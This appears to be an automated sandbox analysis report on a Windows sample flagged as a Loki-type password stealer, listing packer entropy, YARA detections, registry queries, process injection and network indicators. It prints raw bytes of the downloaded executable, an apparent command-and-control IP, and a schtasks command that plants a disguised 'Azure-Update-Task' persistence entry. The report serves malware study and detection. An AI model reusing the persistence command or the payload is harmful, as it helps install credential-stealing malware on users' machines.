InternetReadFile May 18, 2023, 9:33 a.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPEL¼aàú0@`@¼:<P,Ð9800.text« `.rdataÞ0@@.data`@@À.reloc,P"@BUììh(6@ÿ0@EüÀTSV50@WhD6@PÿÖhT6@£@@ÿÐhl6@Eøÿ@@h6@Eðÿ@@h6@Øÿ@@h¬6@øÿ@@h6@Eôÿ@@hÄ6@ÿuüÿÖuühÔ6@V£8@@ÿÐhè6@V£@@ÿ8@@hü6@V£D@@ÿ8@@h7@V£$@@ÿ8@@h7@V£<@@ÿ8@@h 7@V£@@ÿ8@@h07@V£4@@ÿ8@@h<7@V£@@ÿ8@@hH7@V£0@@ÿ8@@uøhT7@V£ @@ÿ8@@h\7@V£@@ÿ8@@hd7@V£T@@ÿ8@@hp7@Vÿ8@@h\|7@Vÿ8@@h7@W£X@@ÿ8@@}üh 7@Wÿ8@@h¬7@Wÿ8@@h¼7@Wÿ8@@hÌ7@W£@@@ÿ8@@hÜ7@S£,@@ÿ8@@hð7@Vÿ8@@uôhü7@V£@@ÿ8@@]ðh8@Sÿ8@@h8@S£(@@ÿ8@@h8@Sÿ8@@h$8@V£@@ÿ8@@h48@V£H@@ÿ8@@hH8@V£\@@ÿ8@@hX8@V£@@ÿ8@@hl8@V£P@@ÿ8@@_^£L@@[ÉÃUììðûÿÿVhP3öVÿ@@øýÿÿPVVjVÿ(0@Àxfh\|8@øýÿÿPÿ@@øýÿÿPÿX@@ÀuVøýÿÿPÿD@@h¤8@øýÿÿPÿ@@øýÿÿPðûÿÿPÿT@@Àtøýÿÿè,^ÉÃVøýÿÿPðûÿÿPÿ0@øýÿÿè jÿÿ0@ÌUììXSVWjD_W3ÛE¨SPñÿ(@@jEì}¨SPÿ(@@Ähj@ÿ@@ºÀ8@EüMüè º9@Müè º09@Müèt ÖMüèj º@9@Müè] }üEìPE¨PSShSSSWhH9@ÿ0@ÀuÿtWÿ0@@3Àë)jÿÿuìÿ0@ÿuì50@ÿÖÿuðÿÖÿtWÿ0@@3À@_^[ÉÃUì3ÀÒtúÿÿÿv¸WÀxHÒt+VW}¾þÿÿ+ò+ùÀt·fÀtfÁêuå_^ÒAþEÁ3ÉÒf¸zEÁë Òt3Òf]ÂUìQSVWjl[òùj1Xf9¤Vÿ @@ø"j0Vÿ@@ÀjOVÿ@@ÀuvjIVÿ@@ÀuiSVÿ@@Àu]Vÿ7ÿT@@ØÛtKÓ+ÑúRèºP0@YMüEüèýVÿ @@MüCèë?tÿ7ÿ 0@Eü3À@éjl[j3Xf9ufVÿ @@ø"uZj0Vÿ@@ÀuMjOVÿ@@Àu@jIVÿ@@Àu3SVÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRèàº0@éWÿÿÿVÿ @@jcYjb[øu[f9uVf9NuPj1Xf9FuGjO^Sÿ@@Àu4jISÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRèvºà0@éíþÿÿjb[Vÿ @@øu^f9uYf~nuRf9^uLj1^Xf9uAjOSÿ@@Àu4jISÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRè ºÐ5@éþÿÿf>LuiVÿ @@ø"u]j0Vÿ@@ÀuPjOVÿ@@ÀuCjIVÿ@@jl[Àu6SVÿ@@ÀuVÿ7ÿT@@ØÛtÓ+ÑúRèº81@éþÿÿjl[f>MufVÿ @@ø"uZj0Vÿ@@ÀuMjOVÿ@@Àu@jIVÿ@@Àu3SVÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRè+º1@é¢ýÿÿVÿ @@jtYø+ucjlXf9u[f9NuUjcXf9FuLj1^Xf9uAjOSÿ@@Àu4jISÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRè¹ºÈ1@é0ýÿÿÎèèÀt'Vÿ7ÿT@@ØÛtÓ+ÑúRèº 2@éþüÿÿÎè{Àt'Vÿ7ÿT@@ØÛtÓ+ÑúRèUºx2@éÌüÿÿÎèðÀt'Vÿ7ÿT@@ØÛtÓ+ÑúRè#º83@éüÿÿÎèYÀt'Vÿ7ÿT@@ØÛtÓ+ÑúRèñºø3@éhüÿÿVÿ @@øguLf>auFjdXf9Fu=f9Fu7f~ru0j1Xf9Fu'Vÿ7ÿT@@ØÛtÓ+ÑúRèº@4@éüÿÿVÿ @@ø;uqf>Aukf~eudf~2u]j0Vÿ@@ÀuPjOVÿ@@ÀuCjIVÿ@@Àu6jlXPVÿ@@Àu'Vÿ7ÿT@@ØÛtÓ+ÑúRèº5@éûÿÿVÿ @@jt[ø#unf9uij1Xf9Fu`j0Vÿ@@ÀuSjOVÿ@@ÀuFjIVÿ@@Àu9jlXPVÿ@@ÀuVÿ7ÿT@@ØÛtÓ+ÑúRè¢º5@éûÿÿjt[Vÿ @@ø#uSf9uNj3Xf9FuEj0Vÿ@@Àu8jOVÿ@@Àu+jIVÿ@@ÀujlXPVÿ@@ÀuVÿ7ÿT@@ØÛu3À_^[ÉÃSVW4UùVjÿ$@@VØWSÿ@@Pÿ@@ÄSÿ4@@jÿH@@Àt ÿ@@Sj ÿP@@ÿL@@Sÿ<@@3ÀëÈÿ_^[ÃV3öVÿH@@ÀtWj ÿ\@@øÿtWÿ@@ðötWÿ4@@ÿL@@_Æ^ÃUììSVWèøôÿÿh00@jjÿ@@@ÿ,@@=·ujÿ0@èA÷ÿÿ}èèÿÿÿ3ÛEüÀPÿ @@p6Pj@Eèÿ@@ÿuüÖEøÈèªøÿÿMü3ö!]ô·ÐfÀ¹Mð·ÂEì·Âø tCº f;Ât9ø t4ø t/ø tEì·ÀÛuÿuèj@ÿ@@MüøEðC3ö·fwFë$Ût 3ÀMø×fw3ÛèøÿÿÿtWÿ0@@MüEô@ request_handle: 0x00cc0010	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0009a200', u'virtual_address': u'0x0001c000', u'entropy': 7.846238029569218, u'name': u'.data', u'virtual_size': u'0x003152e8'}

entropy

7.84623802957

description

A section with a high entropy has been found

entropy

0.832545577313

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.openssl.org/support/faq.html
url	https://steamcommunity.com/profiles/76561199263069598
url	https://t.me/cybehost

Yara rule detected in process memory (50 events)

description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Win32 PWS Loki	rule	Win32_PWS_Loki_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000057c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExA May 18, 2023, 9:33 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x80000002 key_handle: 0x0000058c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"

Communicates with host for which no DNS query was performed (1 event)

host

116.203.165.188

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2052 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2332 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2760 region_size: 438272 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

